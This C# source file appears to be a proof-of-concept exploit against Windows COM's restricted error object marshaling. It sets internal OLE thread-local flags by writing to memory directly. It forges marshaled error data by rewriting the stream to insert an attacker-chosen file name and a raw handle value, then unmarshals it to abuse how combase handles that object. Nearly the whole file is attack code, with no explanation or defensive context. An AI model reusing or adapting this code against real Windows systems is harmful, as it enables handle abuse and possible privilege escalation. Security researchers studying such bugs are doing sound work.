﻿using NtApiDotNet;
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Text;

namespace RestrictedError
{
    [ComVisible(true)]
    class IStreamImpl : IStream, IDisposable
    {
        private readonly Stream m_stream;
        private readonly Func<Stream, byte[], int, bool> m_writecallback;

        public IStreamImpl(Stream stream) 
            : this(stream, null)
        {
        }

        public IStreamImpl(Stream stream, Func<Stream, byte[], int, bool> write_callback)
        {
            m_stream = stream;
            m_writecallback = write_callback;
        }

        public IStreamImpl(string strFileName, FileMode mode, FileAccess access, FileShare share)
        {
            m_stream = File.Open(strFileName, mode, access, share);
        }

        public void Dispose()
        {
            m_stream.Dispose();
        }

        public void Close()
        {
            Dispose();
        }

        public void Clone(out IStream pStm)
        {
            throw new NotImplementedException();
        }

        public void Stat(out System.Runtime.InteropServices.ComTypes.STATSTG statStg, int grfFlags)
        {
            statStg = new System.Runtime.InteropServices.ComTypes.STATSTG();
            statStg.cbSize = m_stream.Length;
        }

        public void UnlockRegion(long libOffset, long cb, int dwLockType)
        {
            throw new NotImplementedException();
        }

        public void LockRegion(long libOffset, long cb, int dwLockType)
        {
            throw new NotImplementedException();
        }

        public void Revert()
        {
            throw new NotImplementedException();
        }

        public void Commit(int grfCommitFlags)
        {
            throw new NotImplementedException();
        }

        public void CopyTo(IStream pstm, long cb, IntPtr pcbRead, IntPtr pcbWritten)
        {
            throw new NotImplementedException();
        }

        public void SetSize(long lSize)
        {
            throw new NotImplementedException();
        }

        public void Seek(long dlibMove, int dwOrigin, IntPtr plibNewPosition)
        {
            SeekOrigin origin;

            switch (dwOrigin)
            {
                case 0:
                    origin = SeekOrigin.Begin;
                    break;
                case 1:
                    origin = SeekOrigin.Current;
                    break;
                case 2:
                    origin = SeekOrigin.End;
                    break;
                default: throw new ArgumentException();
            }
            m_stream.Seek(dlibMove, origin);
            if (plibNewPosition != IntPtr.Zero)
            {
                Marshal.WriteInt64(plibNewPosition, m_stream.Position);
            }
        }

        public void Read(byte[] pv, int cb, IntPtr pcbRead)
        {
            int readCount = m_stream.Read(pv, 0, cb);
            if (pcbRead != IntPtr.Zero)
            {
                Marshal.WriteInt32(pcbRead, readCount);
            }
        }

        public void Write(byte[] pv, int cb, IntPtr pcbWritten)
        {
            if (pv != null)
            {
                if (m_writecallback == null || m_writecallback(m_stream, pv, cb))
                {
                    m_stream.Write(pv, 0, cb);
                    if (pcbWritten != IntPtr.Zero)
                    {
                        Marshal.WriteInt32(pcbWritten, cb);
                    }
                }
            }
        }
    }

    static class Program
    {
        public enum MSHCTX
        {
            LOCAL = 0,
            NOSHAREDMEM = 1,
            DIFFERENTMACHINE = 2,
            INPROC = 3,
            CROSSCTX = 4
        }

        public enum MSHLFLAGS
        {
            NORMAL = 0,
            TABLESTRONG = 1,
            TABLEWEAK = 2,
            NOPING = 4
        }

        [DllImport("ole32.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, PreserveSig = false)]
        public static extern void CoMarshalInterface(IStream pStm, ref Guid riid,
                [MarshalAs(UnmanagedType.Interface)] object pUnk, MSHCTX dwDestContext, IntPtr pvDestContext, MSHLFLAGS mshlflags);

        [DllImport("ole32.dll", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, PreserveSig = false)]
        public static extern void CoReleaseMarshalData(
              IStream pStm
            );

        [DllImport("ole32.dll", PreserveSig = false)]
        [return: MarshalAs(UnmanagedType.IUnknown)]
        public static extern object CoUnmarshalInterface(IStream stm, ref Guid riid);

        const int FlagsOffset = 0xC;
        const int TlsOffset = 0xF80;

        static IntPtr GetOleTls()
        {
            IntPtr teb = NtThread.Current.TebBaseAddress;
            return Marshal.ReadIntPtr(teb + TlsOffset);
        }

        [Flags]
        enum OLETLSFLAGS
        {
            OLETLS_LOCALTID = 0x1,
            OLETLS_UUIDINITIALIZED = 0x2,
            OLETLS_INTHREADDETACH = 0x4,
            OLETLS_CHANNELTHREADINITIALZED = 0x8,
            OLETLS_WOWTHREAD = 0x10,
            OLETLS_THREADUNINITIALIZING = 0x20,
            OLETLS_DISABLE_OLE1DDE = 0x40,
            OLETLS_APARTMENTTHREADED = 0x80,
            OLETLS_MULTITHREADED = 0x100,
            OLETLS_IMPERSONATING = 0x200,
            OLETLS_DISABLE_EVENTLOGGER = 0x400,
            OLETLS_INNEUTRALAPT = 0x800,
            OLETLS_DISPATCHTHREAD = 0x1000,
            OLETLS_HOSTTHREAD = 0x2000,
            OLETLS_ALLOWCOINIT = 0x4000,
            OLETLS_PENDINGUNINIT = 0x8000,
            OLETLS_FIRSTMTAINIT = 0x10000,
            OLETLS_FIRSTNTAINIT = 0x20000,
            OLETLS_APTINITIALIZING = 0x40000,
            OLETLS_UIMSGSINMODALLOOP = 0x80000,
            OLETLS_MARSHALING_ERROR_OBJECT = 0x100000,
            OLETLS_WINRT_INITIALIZE = 0x200000,
            OLETLS_APPLICATION_STA = 0x400000,
            OLETLS_IN_SHUTDOWN_CALLBACKS = 0x800000,
            OLETLS_POINTER_INPUT_BLOCKED = 0x1000000,
            OLETLS_IN_ACTIVATION_FILTER = 0x2000000,
            OLETLS_ASTATOASTAEXEMPT_QUIRK = 0x4000000,
            OLETLS_ASTATOASTAEXEMPT_PROXY = 0x8000000,
            OLETLS_ASTATOASTAEXEMPT_INDOUBT = 0x10000000,
            OLETLS_DETECTED_USER_INITIALIZED = 0x20000000,
        };

        static void SetOleTlsFlags(OLETLSFLAGS flags)
        {
            IntPtr flags_ptr = GetOleTls() + FlagsOffset;
            int curr_flags = Marshal.ReadInt32(flags_ptr);
            curr_flags |= (int)flags;
            Marshal.WriteInt32(flags_ptr, curr_flags);
        }

        static void ClearOleTlsFlags(OLETLSFLAGS flags)
        {
            IntPtr flags_ptr = GetOleTls() + FlagsOffset;
            int curr_flags = Marshal.ReadInt32(flags_ptr);
            curr_flags &= ~(int)flags;
            Marshal.WriteInt32(flags_ptr, curr_flags);
        }

        enum EOLE_AUTHENTICATION_CAPABILITIES
        {
            EOAC_NONE = 0,
            EOAC_MUTUAL_AUTH = 0x1,
            EOAC_STATIC_CLOAKING = 0x20,
            EOAC_DYNAMIC_CLOAKING = 0x40,
            EOAC_ANY_AUTHORITY = 0x80,
            EOAC_MAKE_FULLSIC = 0x100,
            EOAC_DEFAULT = 0x800,
            EOAC_SECURE_REFS = 0x2,
            EOAC_ACCESS_CONTROL = 0x4,
            EOAC_APPID = 0x8,
            EOAC_DYNAMIC = 0x10,
            EOAC_REQUIRE_FULLSIC = 0x200,
            EOAC_AUTO_IMPERSONATE = 0x400,
            EOAC_NO_CUSTOM_MARSHAL = 0x2000,
            EOAC_DISABLE_AAA = 0x1000
        }

        enum AuthnLevel
        {
            RPC_C_AUTHN_LEVEL_DEFAULT = 0,
            RPC_C_AUTHN_LEVEL_NONE = 1,
            RPC_C_AUTHN_LEVEL_CONNECT = 2,
            RPC_C_AUTHN_LEVEL_CALL = 3,
            RPC_C_AUTHN_LEVEL_PKT = 4,
            RPC_C_AUTHN_LEVEL_PKT_INTEGRITY = 5,
            RPC_C_AUTHN_LEVEL_PKT_PRIVACY = 6
        }

        enum ImpLevel
        {
            RPC_C_IMP_LEVEL_DEFAULT = 0,
            RPC_C_IMP_LEVEL_ANONYMOUS = 1,
            RPC_C_IMP_LEVEL_IDENTIFY = 2,
            RPC_C_IMP_LEVEL_IMPERSONATE = 3,
            RPC_C_IMP_LEVEL_DELEGATE = 4,
        }

        [DllImport("ole32.dll", PreserveSig = false)]
        static extern void CoInitializeSecurity(
            IntPtr pSecDesc,
            int cAuthSvc,
            IntPtr asAuthSvc,
            IntPtr pReserved1,
            AuthnLevel dwAuthnLevel,
            ImpLevel dwImpLevel,
            IntPtr pAuthList,
            EOLE_AUTHENTICATION_CAPABILITIES dwCapabilities,
            IntPtr pReserved3
        );

        [DllImport("combase.dll", CharSet = CharSet.Unicode, PreserveSig = false)]
        static extern void RoCaptureErrorContext(int hr);

        [DllImport("combase.dll", CharSet = CharSet.Unicode)]
        static extern bool RoOriginateError(
          int error,
          [MarshalAs(UnmanagedType.HString)] string message
        );

        [Guid("82BA7092-4C88-427D-A7BC-16DD93FEB67E")]
        [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
        interface IRestrictedErrorInfo
        {
            void GetErrorDetails(
                [MarshalAs(UnmanagedType.BStr)] out string description,
                out int error,
                [MarshalAs(UnmanagedType.BStr)] out string restrictedDescription,
                [MarshalAs(UnmanagedType.BStr)] out string capabilitySid);

            void GetReference(
                [MarshalAs(UnmanagedType.BStr)] out string reference);
        };

        [DllImport("combase.dll", CharSet = CharSet.Unicode)]
        static extern int GetRestrictedErrorInfo(out IRestrictedErrorInfo ppRestrictedErrorInfo);

        static Guid IID_IUnknown = new Guid("00000000-0000-0000-C000-000000000046");

        static void WriteZString(this BinaryWriter writer, string str)
        {
            writer.Write(Encoding.Unicode.GetBytes(str + "\0"));
        }

        static void WriteSizedString(this BinaryWriter writer, string str)
        {
            writer.Write(str.Length);
            writer.WriteZString(str);
        }

        const string RestrictedErrorPrefix = "RestrictedErrorObject-";
        const string RestrictedErrorName = RestrictedErrorPrefix + @"\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

        static MemoryStream CreateMarshaledError(NtObject obj, string name)
        {
            MemoryStream stm = new MemoryStream();
            IStreamImpl istm = new IStreamImpl(stm, (s,ba,cb) =>
            {
                if (cb == 8)
                {
                    Console.WriteLine("Rewriting the handle value.");
                    stm.Position = stm.Position - 2;
                    BinaryWriter writer = new BinaryWriter(stm, Encoding.UTF8, true);
                    writer.WriteZString(name);
                    writer.Write(obj.Handle.DangerousGetHandle().ToInt64());
                    return false;
                }

                return true;
            }
            );

            RoCaptureErrorContext(unchecked((int)0x8000FFFF));
            if (GetRestrictedErrorInfo(out IRestrictedErrorInfo err) != 0)
            {
                throw new ArgumentException("Can't get error info");
            }

            Guid iid = new Guid("00000000-0000-0000-C000-000000000046");
            SetOleTlsFlags(OLETLSFLAGS.OLETLS_MARSHALING_ERROR_OBJECT);
            CoMarshalInterface(istm, ref iid, err, MSHCTX.INPROC, IntPtr.Zero, MSHLFLAGS.NORMAL);
            ClearOleTlsFlags(OLETLSFLAGS.OLETLS_MARSHALING_ERROR_OBJECT);

            stm.Position = 0;
            return stm;
        }

        static void Run()
        {
            if (Environment.Is64BitProcess)
            {
                throw new ArgumentException("Must run in a 32 bit process");
            }

            Directory.CreateDirectory(RestrictedErrorPrefix);
            using (NtFile obj = NtFile.Create(NtFileUtils.DosFileNameToNt(RestrictedErrorName), FileAccessRights.MaximumAllowed, 
                FileShareMode.None, FileOpenOptions.NonDirectoryFile, FileDisposition.OpenIf, null))
            {
                var stm = CreateMarshaledError(obj, RestrictedErrorName);
                var istm = new IStreamImpl(stm);
                Guid iid = IID_IUnknown;
                Console.WriteLine(obj.FullPath);
                var err = CoUnmarshalInterface(istm, ref iid);
                // Release to ensure the object is released.
                Marshal.ReleaseComObject(err);
                Console.WriteLine(obj.FullPath);
            }
        }

        [STAThread]
        static void Main(string[] args)
        {
            try
            {
                CoInitializeSecurity(IntPtr.Zero, -1, IntPtr.Zero, IntPtr.Zero, AuthnLevel.RPC_C_AUTHN_LEVEL_DEFAULT,
                    ImpLevel.RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero, EOLE_AUTHENTICATION_CAPABILITIES.EOAC_NO_CUSTOM_MARSHAL, IntPtr.Zero);
                Run();
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
